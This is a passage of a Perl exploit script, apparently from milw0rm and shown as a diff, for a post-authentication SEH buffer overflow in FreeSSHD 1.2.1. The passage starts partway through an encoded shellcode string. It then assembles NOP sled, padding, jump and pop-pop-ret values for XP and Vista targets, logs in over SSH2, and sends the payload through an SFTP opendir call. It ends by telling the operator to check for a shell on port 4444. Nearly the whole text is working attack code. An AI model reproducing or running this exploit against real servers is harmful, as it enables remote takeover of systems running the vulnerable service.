+"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x36\x43\x56".
+"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c".
+"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x41\x33\x42\x4c".
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x52".
+"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
+"\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f".
+"\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x45\x41\x55\x41\x35\x4c\x46".
+"\x41\x50\x41\x35\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x36".
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56".
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
+"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d".
+"\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d".
+"\x4f\x4f\x42\x4d\x5a";
+
+my $nops      = "\x90"x64;
+my $offset1xp = "\x41"x242;
+my $offset1vi = "\x41"x226;
+my $offset2xp = "\x41"x24;
+my $offset2vi = "\x41"x43;
+my $ppr       = "\xde\x13\x40";         
+my $jmpsxp    = "\xeb\xe1\x90\x90";     
+my $jmpsvi    = "\xeb\xce\x90\x90";     
+my $jmpn      = "\xe9\x23\xfc\xff\xff"; 
+my $ip        = $ARGV[0];
+my $port      = int($ARGV[1]);
+my $user      = $ARGV[2];
+my $pass      = $ARGV[3];
+my $payload   = '';
+if ($ARGV[4] == '1')
+{
+   $payload = $nops.$shellcode.$offset1xp.$jmpn.$offset2xp.$jmpsxp.$ppr;
+}
+elsif ($ARGV[4] == '2')
+{
+   $payload = $nops.$shellcode.$offset1vi.$jmpn.$offset2vi.$jmpsvi.$ppr;  
+}
+else
+{
+   print "[-] TARGET ERROR!\n";
+   exit;
+}
+print "[+] FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow\n";
+print "[+] Coded by Matteo Memelli aka ryujin\n";
+print "[+] SSC: Stack Spring Cleaning... >> rm thisJunk <<\n";
+# If you start the exploit before any other connection, everything is fine
+# otherwise exploit could become less reliable. 
+# So let's rm some junk before exploiting our app...
+for (my $count = 30; $count >= 1; $count--) {
+   my $ssh2 = Net::SSH2->new();
+   $ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
+   $ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
+   $ssh2->disconnect();
+}
+my $ssh2 = Net::SSH2->new();
+$ssh2->connect($ip, $port) || die "[-] Connnection Failed!";
+$ssh2->auth_password($user,$pass)|| die "Wrong Username or Passwd!";
+print "[+] Exploiting FreSSHDService...\n";
+print "[+] Sending Payload...\n";
+print "[*] Done! CTRL-C and check your shell on port 4444\n";
+my $sftp = $ssh2->sftp();
+my $bad  = $sftp->opendir($payload);
+exit;
+
+# milw0rm.com [2008-06-06]